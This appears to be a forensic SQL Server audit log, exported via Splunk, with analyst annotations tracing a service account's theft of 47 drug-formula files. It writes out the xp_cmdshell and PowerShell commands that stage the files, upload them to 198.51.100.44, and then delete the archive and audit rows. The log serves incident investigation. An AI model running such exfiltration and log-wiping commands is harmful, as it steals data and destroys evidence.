{"EventTime":"2024-11-06T00:10:14Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"xp_cmdshell 'dir \"D:\\LicenseDeals\\USPartner2024\\\" /b /s'","RowsAffected":0,"AdditionalInfo":"Extended stored procedure called — directory enumeration of formula package","analyst_note":"⚠ svc_backup runs xp_cmdshell to enumerate USPartner2024 directory — 47 files listed"}
{"EventTime":"2024-11-06T00:10:18Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"FileServer_Audit","SchemaName":"dbo","ObjectName":"AuditLog","StatementType":"SELECT","Statement":"SELECT TOP 1 * FROM dbo.AuditLog WHERE ObjectPath LIKE '%USPartner2024%' ORDER BY EventTime DESC","RowsAffected":1,"AdditionalInfo":"Adversary queries audit log — may be checking for prior access records","analyst_note":"Adversary queried existing audit log — reconnaissance on prior access to formula directory"}
{"EventTime":"2024-11-06T00:10:44Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"EXEC xp_cmdshell 'powershell.exe -Command \"Compress-Archive -Path D:\\LicenseDeals\\USPartner2024\\* -DestinationPath C:\\Windows\\Temp\\update_pkg.zip -CompressionLevel Optimal\"'","RowsAffected":0,"AdditionalInfo":"Compression of 47 formula files into update_pkg.zip via xp_cmdshell → PowerShell","analyst_note":"⚠ CRITICAL: All 47 formula files compressed into single archive C:\\Windows\\Temp\\update_pkg.zip — pre-exfiltration staging"}
{"EventTime":"2024-11-06T00:13:54Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"EXEC xp_cmdshell 'powershell.exe -Command \"$c=New-Object System.Net.WebClient;$c.UploadFile(\\\"https://198.51.100.44/recv\\\",\\\"POST\\\",\\\"C:\\Windows\\Temp\\update_pkg.zip\\\")\"'","RowsAffected":0,"AdditionalInfo":"WebClient UploadFile to 198.51.100.44 — exfiltration of compressed formula package","analyst_note":"⚠ CRITICAL: Formula archive uploaded to 198.51.100.44 via PowerShell WebClient — 381 MB. Matches Palo Alto NGFW flow at 00:14:14Z"}
{"EventTime":"2024-11-06T00:14:58Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"master","SchemaName":null,"ObjectName":null,"StatementType":"BATCH_COMPLETED","Statement":"EXEC xp_cmdshell 'del /F /Q \"C:\\Windows\\Temp\\update_pkg.zip\"'","RowsAffected":0,"AdditionalInfo":"Staged archive deleted from temp directory after upload","analyst_note":"Anti-forensic cleanup — archive deleted after exfiltration. File no longer recoverable without disk image (legal hold prevents this on WS-IT-LEVI)."}
{"EventTime":"2024-11-06T00:15:22Z","ServerName":"SERVER-RD-02","LoginName":"LIFETECHPHARMA\\svc_backup","ClientHost":"WS-IT-LEVI","ApplicationName":"Microsoft Windows","DatabaseName":"FileServer_Audit","SchemaName":"dbo","ObjectName":"AuditLog","StatementType":"DELETE","Statement":"DELETE FROM dbo.AuditLog WHERE EventTime >= '2024-11-06T00:00:00' AND LoginName = 'LIFETECHPHARMA\\svc_backup'","RowsAffected":8,"AdditionalInfo":"Adversary deletes own audit trail from database audit log — 8 rows removed","analyst_note":"⚠ Anti-forensics: SQL audit log partially cleared for svc_backup session on Nov 6. 8 rows deleted. These entries were recovered from the Splunk-forwarded copy (Splunk ingested before delete). This file represents the Splunk copy — NOT the server-side database."}